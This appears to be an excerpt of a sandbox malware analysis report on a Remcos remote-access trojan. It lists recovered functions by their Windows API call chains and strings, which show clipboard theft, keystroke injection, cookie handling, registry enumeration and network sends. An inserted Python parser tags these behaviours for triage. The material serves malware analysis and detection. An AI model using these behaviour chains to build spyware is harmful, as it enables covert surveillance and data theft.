                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                        • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                        • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                          • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                          • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                        • String ID: .part
                                                                                                        • API String ID: 1303771098-3499674018
                                                                                                        • Opcode ID: d50e3930c99f8cddacc32f51ad6110cbbcfbd567f3e003bfc65bfd9ee2b121de
                                                                                                        • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                                                        • Opcode Fuzzy Hash: d50e3930c99f8cddacc32f51ad6110cbbcfbd567f3e003bfc65bfd9ee2b121de
                                                                                                        • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
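The function entries above describe each recovered routine only by its Win32 call chain and its "String ID" values. The Python below is an added example by the editor, not part of the Joe Sandbox report and not code from the Remcos sample: it parses entries in this listing format and tags the behaviour the call chain implies, namely the waveInOpen / waveInPrepareHeader / waveInAddBuffer / waveInStart chain (microphone capture), Shell_NotifyIconA beside the "Remcos" string (tray icon), CreateFileW / WriteFile / MoveFileW together with ".part" (a download written to a temporary name and then renamed), and a reachable WS2_32 send. The SAMPLE text is a constructed excerpt of three of the report's own entries with argument lists shortened; the rule set and the names parse_entries, classify and triage are the editor's assumptions, not Joe Sandbox fields. Calls listed as "Part of subcall function" are counted as reachable from the function.

```python
"""Triage helper for Joe Sandbox per-function listings (added example, not
part of the report). Each function entry is reduced to the Win32 calls it
reaches and its "String ID" values, then tagged with the behaviour that
call chain implies. Rule names and rule contents are the editor's own."""
import re
from dataclasses import dataclass, field

# One "• Name.MODULE(...)" line; nested "Part of subcall function" lines count
# as reachable from the function, so they are captured too.
API_CALL = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"([A-Za-z_]\w*)\.([A-Z0-9_]+)")
# Fields of the Similarity block; "Instruction Fuzzy Hash" is the last field
# of every entry and therefore marks where one entry ends.
FIELD = re.compile(r"^\s*•\s*(String ID|Opcode ID|Instruction Fuzzy Hash):\s*(.*)$")


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)     # call names in listing order
    strings: list = field(default_factory=list)  # "$"-separated String ID values
    opcode_id: str = ""


# (tag, API names that must all be reachable, substring required in a String ID)
RULES = [
    ("audio_capture", {"waveInOpen", "waveInPrepareHeader", "waveInAddBuffer", "waveInStart"}, None),
    ("tray_icon", {"Shell_NotifyIconA"}, None),
    ("staged_file_write", {"CreateFileW", "WriteFile", "MoveFileW"}, ".part"),
    ("socket_send", {"send"}, None),
]


def parse_entries(text: str) -> list:
    """Split a listing into FunctionEntry objects, one per Instruction Fuzzy Hash."""
    entries, cur = [], FunctionEntry()
    for line in text.splitlines():
        m = FIELD.match(line)
        if m:
            key, val = m.group(1), m.group(2).strip()
            if key == "String ID":
                cur.strings = [s for s in val.split("$") if s]
            elif key == "Opcode ID":
                cur.opcode_id = val
            else:                      # Instruction Fuzzy Hash: entry complete
                entries.append(cur)
                cur = FunctionEntry()
            continue
        m = API_CALL.match(line)
        if m:
            cur.apis.append(m.group(1))
    return entries


def classify(entry: FunctionEntry) -> list:
    """Return the RULES tags whose API set (and optional string) the entry satisfies."""
    have = set(entry.apis)
    return [tag for tag, needed, needle in RULES
            if needed <= have
            and (needle is None or any(needle in s for s in entry.strings))]


def triage(text: str) -> dict:
    """Map Opcode ID -> behaviour tags for every entry in the listing."""
    return {e.opcode_id: classify(e) for e in parse_entries(text)}


# Constructed excerpt of three entries from the report above; argument lists
# are shortened, the Opcode IDs and fuzzy hashes are the report's own.
SAMPLE = """\
APIs
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
• waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E), ref: 00401A11
• waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
• waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
• waveInStart.WINMM ref: 00401A81
• API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
• String ID: XCG$`=G$x=G
• Opcode ID: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
• Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
  • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
• ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
• lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
• Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
• String ID: Remcos
• Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
• Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
APIs
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002), ref: 00406C38
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00406C80
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
• CloseHandle.KERNEL32(00000000), ref: 00406CC0
• MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
• DeleteFileW.KERNEL32(00000000), ref: 00406D18
• String ID: .part
• Opcode ID: d50e3930c99f8cddacc32f51ad6110cbbcfbd567f3e003bfc65bfd9ee2b121de
• Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
"""

if __name__ == "__main__":
    for opcode_id, tags in triage(SAMPLE).items():
        print(opcode_id[:16], tags or ["-"])
```

Feeding the full listing instead of SAMPLE works the same way, since the regexes ignore the Memory Dump Source, Yara matches and Similarity header lines; the Opcode ID is used as the key because it is the one per-function identifier that is stable across the report. Rules are deliberately conservative (every named API must be reachable), so a function that only prepares a wave header without starting capture is not tagged.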
                                                                                                        APIs
                                                                                                          • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                          • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                          • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                          • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                        • _wcslen.LIBCMT ref: 0041A8F6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                        • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                        • API String ID: 37874593-703403762
                                                                                                        • Opcode ID: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                                                        • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                                                                        • Opcode Fuzzy Hash: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                                                        • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
                                                                                                        • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
                                                                                                        • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                                                        • __freea.LIBCMT ref: 00449B37
                                                                                                          • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                        • __freea.LIBCMT ref: 00449B40
                                                                                                        • __freea.LIBCMT ref: 00449B65
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                        • API String ID: 3864826663-0
                                                                                                        • Opcode ID: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                                                        • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                                                        • Opcode Fuzzy Hash: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                                                        • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                                                        APIs
                                                                                                        • SendInput.USER32 ref: 00418B08
                                                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                                          • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InputSend$Virtual
                                                                                                        • API String ID: 1167301434-0
                                                                                                        • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                        • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                                                        • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                        • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                                                        APIs
                                                                                                        • OpenClipboard.USER32 ref: 00415A46
                                                                                                        • EmptyClipboard.USER32 ref: 00415A54
                                                                                                        • CloseClipboard.USER32 ref: 00415A5A
                                                                                                        • OpenClipboard.USER32 ref: 00415A61
                                                                                                        • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                        • CloseClipboard.USER32 ref: 00415A89
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                        • API String ID: 2172192267-0
                                                                                                        • Opcode ID: 6a9ec668e7fdea89666e78c86b70ee6c6b12921e874800debc66150193591dc0
                                                                                                        • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                                                        • Opcode Fuzzy Hash: 6a9ec668e7fdea89666e78c86b70ee6c6b12921e874800debc66150193591dc0
                                                                                                        • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 00447EBC
                                                                                                        • _free.LIBCMT ref: 00447EE0
                                                                                                        • _free.LIBCMT ref: 00448067
                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                        • _free.LIBCMT ref: 00448233
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                        • API String ID: 314583886-0
                                                                                                        • Opcode ID: 0db77cb6a5e89d3bc4573ca623af4d9606dd509ec69084a3c4c6f4a44b83d65d
                                                                                                        • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                                                                        • Opcode Fuzzy Hash: 0db77cb6a5e89d3bc4573ca623af4d9606dd509ec69084a3c4c6f4a44b83d65d
                                                                                                        • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • API String ID: 269201875-0
                                                                                                        • Opcode ID: 6e270e3566a57228008d5882711c0e5bb0e0dd5acca1278b8e6f8f313ed3fb9f
                                                                                                        • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                                        • Opcode Fuzzy Hash: 6e270e3566a57228008d5882711c0e5bb0e0dd5acca1278b8e6f8f313ed3fb9f
                                                                                                        • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                                        APIs
                                                                                                          • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                        • _free.LIBCMT ref: 00444086
                                                                                                        • _free.LIBCMT ref: 0044409D
                                                                                                        • _free.LIBCMT ref: 004440BC
                                                                                                        • _free.LIBCMT ref: 004440D7
                                                                                                        • _free.LIBCMT ref: 004440EE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$AllocateHeap
                                                                                                        • String ID: J7D
                                                                                                        • API String ID: 3033488037-1677391033
                                                                                                        • Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                                        • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                                        • Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                                        • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                                        APIs
                                                                                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                                                                        • __fassign.LIBCMT ref: 0044A180
                                                                                                        • __fassign.LIBCMT ref: 0044A19B
                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                                                                        • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                                                        • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                        • API String ID: 1324828854-0
                                                                                                        • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                        • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                                                        • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                        • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID: HE$HE
                                                                                                        • API String ID: 269201875-1978648262
                                                                                                        • Opcode ID: be36c282a63d03c20bc32278ff653e2fb99f791dd32da19cc4c4d74979feac0c
                                                                                                        • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                                                        • Opcode Fuzzy Hash: be36c282a63d03c20bc32278ff653e2fb99f791dd32da19cc4c4d74979feac0c
                                                                                                        • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                          • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                          • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseEnumInfoOpenQuerysend
                                                                                                        • String ID: TUFTUF$>G$DG$DG
                                                                                                        • API String ID: 3114080316-344394840
                                                                                                        • Opcode ID: a7cbbf494201fdfd46b352284ff1bc29af0ab57b085014640ab1cd51c4bb0307
                                                                                                        • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                                                        • Opcode Fuzzy Hash: a7cbbf494201fdfd46b352284ff1bc29af0ab57b085014640ab1cd51c4bb0307
                                                                                                        • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                        APIs
                                                                                                          • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                          • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                          • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                        • API String ID: 1133728706-4073444585
                                                                                                        • Opcode ID: ed863c921e9cafa649e96df88b724608b92e8b32daa03b13c741907c5a10fac7
                                                                                                        • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                                                        • Opcode Fuzzy Hash: ed863c921e9cafa649e96df88b724608b92e8b32daa03b13c741907c5a10fac7
                                                                                                        • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ac8429af2de8aec4c7be5426e4bb47fdde12a831901fd5511e93482c0d59407e
                                                                                                        • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                                                        • Opcode Fuzzy Hash: ac8429af2de8aec4c7be5426e4bb47fdde12a831901fd5511e93482c0d59407e
                                                                                                        • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                        • int.LIBCPMT ref: 0040FC0F
                                                                                                          • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                          • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                        • String ID: P[G
                                                                                                        • API String ID: 2536120697-571123470
                                                                                                        • Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                                        • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                                                        • Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                                        • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                                                        APIs
                                                                                                          • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                                                        • _free.LIBCMT ref: 0044FD29
                                                                                                          • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                          • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                        • _free.LIBCMT ref: 0044FD34
                                                                                                        • _free.LIBCMT ref: 0044FD3F
                                                                                                        • _free.LIBCMT ref: 0044FD93
                                                                                                        • _free.LIBCMT ref: 0044FD9E
                                                                                                        • _free.LIBCMT ref: 0044FDA9
                                                                                                        • _free.LIBCMT ref: 0044FDB4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                        • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                                                        • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                        • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                                                        APIs
                                                                                                        • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 00406835
                                                                                                          • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                          • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                        • CoUninitialize.OLE32 ref: 0040688E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InitializeObjectUninitialize_wcslen
